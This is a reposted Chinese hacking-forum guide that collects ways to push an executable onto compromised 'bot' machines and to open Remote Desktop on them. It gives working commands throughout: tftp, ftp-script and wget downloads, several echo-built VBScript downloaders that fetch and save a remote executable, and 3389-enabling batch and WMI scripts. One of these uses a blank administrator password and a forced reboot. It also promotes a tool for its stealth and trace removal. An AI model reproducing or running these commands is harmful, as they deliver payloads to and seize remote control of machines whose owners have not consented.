上传方法总结（转贴）

上传方法总结[对入侵很实用]- -


前段时间很多朋友在留言本上提出关于上传的问题，现在将本人用于上传的方法进行汇总如下，希望能够对初学者有所帮助：

一. tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe，
再将文件（sample.exe)上传到别的机器中(肉鸡），
肉鸡cmd中执行： tftp -i 服务器ip get sample.exe

二. ftp法
肉鸡cmd中执行：
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt

三. 工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行：wget 网站/sample.exe

四. 利用dl.vbe法
肉鸡cmd中执行：
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

五. 利用iget.vbe法
方法同4，
肉鸡cmd中执行：
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject("microsoft.xmlhttp") >>iget.vbe
echo xpost.open "get",iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject("adodb.stream") >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.resp >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe

cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

六. 利用http网站vbe法
echo set xpost = createobject("microsoft.xmlhttp") >dsa.vbe
echo xpost.open "get","http://*.*.*.*/sample.exe",0 >>dsa.vbe
echo xpost.send() >>dsa.vbe
echo set sget = createobject("adodb.stream") >>dsa.vbe
echo sget.mode = 3 >>dsa.vbe
echo sget.type = 1 >>dsa.vbe
echo sget.open() >>dsa.vbe
echo sget.write(xpost.resp >>dsa.vbe
echo sget.savetofile "sample.exe",2 >>dsa.vbe

cscript dsa.vbe
del dsa.vbe

七. 3389法
可以开3389，然后登陆，进行本地的下载。该方法对服务器上传很严格的机器特有效。（包括硬件防火墙）


那么怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用:
1，打开记事本，编辑内容如下：
echo [comp > c:sql
echo tsenable = on >> c:sql
sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
编辑好后存为bat文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

2 (对xp2000都有效) 脚本文件 本地开3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

c:>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

比如扫描到了一个有nt弱口令的服务器，ip地址是222.222.222.222，管理员帐户是administrator，密码为空
运行cmd（2000下的dos），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是ip，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，ip地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者wmi服务关闭，那么脚本就没用了。


3，下载3389自动安装程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
说明：
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:winnttemp下，然后进入c:winnttemp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！

特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:winnttemp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！

5，下载dameware nt utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方ip用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后ok。